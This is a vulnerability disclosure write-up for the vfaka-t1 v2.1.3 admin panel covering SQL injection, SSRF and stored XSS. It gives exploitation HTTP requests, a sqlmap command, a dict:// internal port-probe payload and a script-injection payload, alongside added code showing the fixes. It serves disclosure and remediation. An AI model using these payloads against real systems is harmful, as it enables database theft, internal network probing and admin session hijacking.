vfaka

This article was last updated on the evening of April 22, 2026.


Test Environment: localhost

Windows + Apache2 + PhpStorm + PHP 7.3.4

SQL Injection Vulnerability

Description

There is an SQL injection vulnerability in vfaka-t1 v2.1.3 at the “/admin/wholesale.php” location.

Impact

An attacker can exploit this SQL injection to read, modify, or delete sensitive database contents, potentially gaining full control over the admin panel and compromising the entire system.

Vulnerability reproduction

1. Vulnerability analysis

Vulnerability file: /admin/wholesale.php

image-20260304161151462

After receiving the parameter "id", the code does not use a prepared statement or perform any filtering; it concatenates the value directly into the SQL statement, resulting in an SQL injection vulnerability.

There are 11 vulnerable points, depending on the value of the "type" parameter.

image-20260304163142566
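The following is an added example, not vfaka's own code: a minimal reconstruction of the pattern described above (the "id" value concatenated into the query text, with "type" selecting which statement runs) next to a hardened version that allow-lists "type" and binds "id" through a prepared statement. The table and column names (wholesale, id, type, title) and the two-entry type list are assumptions; the real file has 11 type branches.

```php
<?php
// Added example, not vfaka's own code. Table/column names and the
// ALLOWED_TYPES list are assumptions used only to make the demo run.

// Vulnerable pattern: the request value becomes part of the SQL text, so
// anything appended to "id" is parsed as SQL (this is what sqlmap reported
// as time-based and boolean-based blind injection).
function info_vulnerable(PDO $db, string $type, string $id): ?array
{
    $sql = "SELECT * FROM wholesale WHERE type = '$type' AND id = $id";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened pattern: check "type" against the fixed set of values the code
// actually handles, require "id" to be a decimal integer, and use a prepared
// statement so neither value ever touches the SQL grammar.
const ALLOWED_TYPES = ['text', 'card']; // assumption: stand-in for the 11 real branches

function info_hardened(PDO $db, string $type, string $id): ?array
{
    if (!in_array($type, ALLOWED_TYPES, true)) {
        throw new InvalidArgumentException("unknown type: $type");
    }
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException('id must be a decimal integer');
    }
    $stmt = $db->prepare('SELECT * FROM wholesale WHERE type = :type AND id = :id');
    $stmt->bindValue(':type', $type, PDO::PARAM_STR);
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-contained demo on an in-memory SQLite database with constructed rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE wholesale (id INTEGER PRIMARY KEY, type TEXT, title TEXT)');
$db->exec("INSERT INTO wholesale VALUES (1, 'card', 'card one'), (2, 'text', 'text two')");

// A well-formed request behaves the same in both versions.
var_dump(info_vulnerable($db, 'text', '2')['title']);
var_dump(info_hardened($db, 'text', '2')['title']);

// A malformed id: the vulnerable version still runs a query, just not the
// one the developer wrote (the WHERE clause has been rewritten); the
// hardened version refuses before any SQL is built.
$bad = '2 OR 1=1';
var_dump(info_vulnerable($db, 'text', $bad)['title']);
try {
    info_hardened($db, 'text', $bad);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The allow-list on "type" matters as much as the bound "id": with 11 branches selected by that parameter, a switch on a validated value keeps every branch's query fixed, while a prepared statement per branch removes the concatenation that sqlmap exploited.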

2. Vulnerability exploitation

First, log in to the backend using the administrator account and password.

image-20260304162023928

Construct the payload:

GET /admin/wholesale.php?action=info&type=text&id=2 HTTP/1.1
Host: 192.168.190.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive

Use sqlmap to verify the vulnerability.

sqlmap confirmed both a time-based blind injection and a boolean-based blind injection.

sqlmap -r '/home/qfbsz/111/daima/vka/sql.txt' --batch -p id

image-20260304163040580

SSRF Vulnerability

Description

There is an SSRF vulnerability in vfaka-t1 v2.1.3 at /admin/wholesale.php.

Impact

An attacker can exploit the SSRF vulnerability to make the server send arbitrary requests to internal or external systems, potentially accessing sensitive internal services, bypassing firewall restrictions, or leaking confidential data.

1. Vulnerability analysis

Vulnerability file: /admin/wholesale.php

image-20260304163352819

After receiving the URL parameter, this code performs no security checks on it and passes it directly to the getbody function to make the request, resulting in an SSRF vulnerability.
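As an added example (not vfaka's code), here is a hypothetical hardened replacement for a fetch helper like the getbody function described above: the URL is validated before any request is made, and curl is restricted to http and https. The function names validate_outbound_url and getbody_safe are assumptions, and the blocked-range check relies on PHP's built-in private/reserved range flags rather than a complete internal address inventory.

```php
<?php
// Added example, not vfaka's own code. validate_outbound_url() and
// getbody_safe() are hypothetical names for a hardened fetch helper.

function validate_outbound_url(string $url): string
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        throw new InvalidArgumentException('malformed URL');
    }
    // Scheme allow-list: curl would otherwise speak dict://, gopher://,
    // file:// and more, so the dict://127.0.0.1:3306 probe above stops here.
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException("scheme not allowed: $scheme");
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        throw new InvalidArgumentException('credentials in URL not allowed');
    }
    $host = strtolower(trim($parts['host'], '[]')); // strip IPv6 brackets
    // Resolve once and validate the address we will actually connect to.
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $ip = $host;
    } else {
        $ip = gethostbyname($host); // returns the name unchanged on failure
        if ($ip === $host) {
            throw new InvalidArgumentException("cannot resolve host: $host");
        }
    }
    // Reject loopback, link-local, RFC 1918 and other reserved ranges.
    if (filter_var($ip, FILTER_VALIDATE_IP,
            FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
        throw new InvalidArgumentException("address not allowed: $ip");
    }
    return $ip;
}

function getbody_safe(string $url, int $timeout = 5): string
{
    $ip     = validate_outbound_url($url);
    $parts  = parse_url($url);
    $scheme = strtolower($parts['scheme']);
    $port   = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_TIMEOUT         => $timeout,
        CURLOPT_FOLLOWLOCATION  => false, // a redirect could point back inside
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // Pin the connection to the address that passed validation so a
        // second DNS lookup (rebinding) cannot swap in an internal address.
        CURLOPT_RESOLVE         => ["{$parts['host']}:{$port}:{$ip}"],
    ]);
    $body = curl_exec($ch);
    if ($body === false) {
        $err = curl_error($ch);
        curl_close($ch);
        throw new RuntimeException("request failed: $err");
    }
    curl_close($ch);
    return $body;
}

// Demo with constructed inputs; the rejections need no network access.
foreach (['dict://127.0.0.1:3306', 'http://127.0.0.1:3306/', 'http://10.0.0.5/admin'] as $u) {
    try {
        validate_outbound_url($u);
        echo "allowed: $u\n";
    } catch (InvalidArgumentException $e) {
        echo "blocked: $u (", $e->getMessage(), ")\n";
    }
}
```

Two caveats on the design: gethostbyname only returns one IPv4 address, so a production version should resolve every A and AAAA record and check each; and the PHP range flags do not cover every address an operator may consider internal (cloud metadata endpoints or carrier-grade NAT space, for instance), so a deployment-specific deny-list is still worth adding on top.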

2. Vulnerability exploitation

First, log in to the backend using the administrator account and password.

image-20260304162023928

Construct the payload:

url=dict://127.0.0.1:3306

POST /admin/wholesale.php?action=list HTTP/1.1
Host: 192.168.190.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

url=dict://127.0.0.1:3306

image-20260304164234127

The internal network port was successfully detected.

Stored Cross-Site Scripting vulnerability

Description

The /admin/usort_add.php endpoint of vfaka-t1 v2.1.3 allows attackers to execute arbitrary web scripts or HTML by injecting a crafted payload into the S_title parameter.

Impact

An attacker can inject malicious scripts or HTML into the S_title parameter, leading to persistent cross‑site scripting (XSS) in the admin panel. This could result in session hijacking, unauthorized administrative actions, or theft of sensitive data.

1. Vulnerability analysis

Vulnerability file: /admin/usort_add.php

image-20260304165741452

When the "S_title" parameter is read, neither the "add" operation nor the "edit" operation converts it to HTML entities; the value is concatenated directly into JavaScript code.

image-20260304165827017
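As an added example (not vfaka's code), the block below shows the raw-interpolation pattern described above beside the encoding each output context needs, using the page's own test string as input. The render_* function names and the JavaScript variable name are assumptions.

```php
<?php
// Added example, not vfaka's own code. Function names are hypothetical.

function render_vulnerable(string $title): string
{
    // Raw interpolation into a script block: a value containing a quote or
    // </script> ends the string literal or the element and runs as markup.
    return "<script>var sortTitle = '$title';</script>";
}

function render_js_safe(string $title): string
{
    // json_encode emits a valid JavaScript string literal; the HEX flags
    // encode < > & ' " as \uXXXX escapes, so the output can neither break
    // out of the literal nor close the surrounding <script> element.
    $js = json_encode($title, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return "<script>var sortTitle = $js;</script>";
}

function render_html_safe(string $title): string
{
    // HTML body or attribute context: entity-encode with both quote styles.
    return '<h1>' . htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h1>';
}

// Constructed input: the same test string used in the report above.
$payload = "<script>alert('xss')</script>";

echo render_vulnerable($payload), "\n"; // the injected element survives intact
echo render_js_safe($payload), "\n";    // every < > ' / is escaped inside a JS string
echo render_html_safe($payload), "\n";  // tags become &lt; ... &gt; text
```

The point of keeping two encoders is that the fix is context-specific: htmlspecialchars alone would still leave a value unsafe inside a JavaScript string (a quote is not an HTML special character), which is exactly the sink the report identifies, so the value written into the script must go through json_encode with the HEX flags, and the same stored value rendered elsewhere in the page gets HTML entity encoding.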

2. Vulnerability exploitation

Payload:

S_title=<script>alert('xss')</script>

POST /admin/usort_add.php?action=add HTTP/1.1
Host: 192.168.190.1
Content-Length: 165
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.190.1
Referer: http://192.168.190.1/admin/usort_add.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive

S_title=<script>alert('xss')</script>&S_sub=0&S_order=0&S_show=1&S_link_type=default&S_link_url=&S_pic=nopic.png&S_keywords=1&S_content=

image-20260304170922739

After a direct refresh, the XSS vulnerability was successfully triggered.

image-20260304170945235


vfaka
http://example.com/2026/03/04/vfaka/
Author: 清风
Published: March 4, 2026
License